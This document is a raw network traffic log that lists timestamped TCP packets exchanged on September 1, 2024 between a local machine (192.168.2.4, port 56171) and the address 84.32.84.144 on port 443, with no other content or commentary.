Sep 1, 2024 18:28:00.993163109 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993717909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993747950 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993781090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993786097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993823051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993823051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.993899107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.993959904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994091034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994123936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994143009 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994146109 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994153023 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994165897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994178057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994189024 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994193077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994204998 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994225025 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994271040 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.994275093 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.994765043 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995028019 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995060921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995073080 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995075941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995095015 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995104074 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995130062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995131969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995131969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995137930 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995162010 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995194912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995213985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995213985 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995218039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995227098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995244026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995317936 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995317936 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995321989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995816946 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995841980 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995860100 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995865107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.995893955 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.995991945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996021032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996037006 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996041059 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996062994 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996196032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996232033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996244907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996248960 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996270895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996296883 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996325016 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996336937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996336937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996336937 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996341944 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.996400118 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.996400118 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997086048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997123003 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997152090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997155905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997163057 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997172117 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997193098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997204065 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997208118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997232914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997236013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997263908 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:00.997267962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:00.997278929 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.010658026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.010699034 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.010725975 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.010732889 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.010742903 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.019120932 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058583021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058645964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058657885 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058670998 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058684111 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058705091 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058708906 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058727026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058732986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058769941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058870077 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058900118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058916092 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.058919907 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.058969021 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059168100 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059200048 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059233904 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059238911 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059266090 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059597969 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059629917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059659004 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059673071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059673071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059678078 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059688091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059700966 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059714079 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059726000 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059730053 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.059758902 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.059844971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060554028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060581923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060597897 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060600996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060609102 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060626984 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060637951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060668945 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060669899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060677052 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060688972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060709000 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060726881 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060735941 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060755014 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.060760021 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.060791969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.061484098 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.061556101 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061593056 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061608076 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.061614990 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061630964 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061647892 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.061660051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061681986 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.061686039 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.061731100 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.062218904 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062259912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062282085 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.062287092 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062295914 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062303066 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.062330008 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062340975 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.062345028 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.062377930 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.062721968 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.086554050 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.086643934 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.086817026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.086817026 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.086827993 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.101617098 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.101690054 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.101696014 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.101705074 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.101768970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.101768970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.101774931 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156411886 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156502962 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156507969 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156517982 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156574011 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156639099 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156676054 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156702995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156723976 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156723976 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156732082 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156745911 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156779051 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.156898022 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.156946898 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157094955 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157135010 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157165051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157176971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157176971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157181978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157202005 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157221079 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157247066 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157249928 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157874107 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157907009 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157938004 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157943010 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157947063 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.157964945 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.157973051 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158004045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158025980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158025980 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158030033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158046007 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158046961 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158076048 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158078909 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158088923 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158117056 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158184052 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.158935070 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.158970118 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159001112 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159003973 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159003973 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159009933 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159034967 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159049034 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159051895 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159066916 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159080029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159096956 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159106970 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159110069 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159126043 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159141064 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159178972 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159183025 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159192085 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159411907 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159459114 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.159926891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159960032 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.159991026 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.160003901 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.160007954 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.160017967 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.160018921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.160039902 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.160082102 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.160085917 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.160674095 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.177459002 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.177561998 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.177575111 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.177725077 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.193442106 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.193516016 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.193767071 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.193938971 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.245110989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.245223045 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.245269060 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.245382071 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.245395899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.245507002 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.245963097 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.245992899 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246038914 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246043921 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246071100 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246263027 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246300936 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246306896 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246310949 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246365070 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246407986 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246476889 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246548891 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246593952 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246639013 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246644020 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246655941 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246790886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246892929 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246943951 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246975899 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.246977091 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246985912 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.246987104 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247015953 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247047901 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247075081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247075081 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247081995 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247091055 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247659922 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247709036 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247711897 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247719049 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247760057 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247771978 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247778893 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247807980 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247828960 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247833014 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247839928 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247859955 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247868061 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247885942 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247889996 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247904062 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.247931004 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247972965 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.247976065 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248835087 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248867989 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248897076 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248898029 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.248904943 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248908043 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.248938084 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248944044 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.248946905 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248980999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.248999119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.248999119 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.249005079 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.249059916 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.268604994 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.268641949 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.268763065 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.268763065 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.268774033 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.274880886 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.284478903 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.284555912 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.284584999 CEST	443	56171	84.32.84.144	192.168.2.4
Sep 1, 2024 18:28:01.284735918 CEST	56171	443	192.168.2.4	84.32.84.144
Sep 1, 2024 18:28:01.335706949 CEST	443	56171	84.32.84.144	192.168.2.4
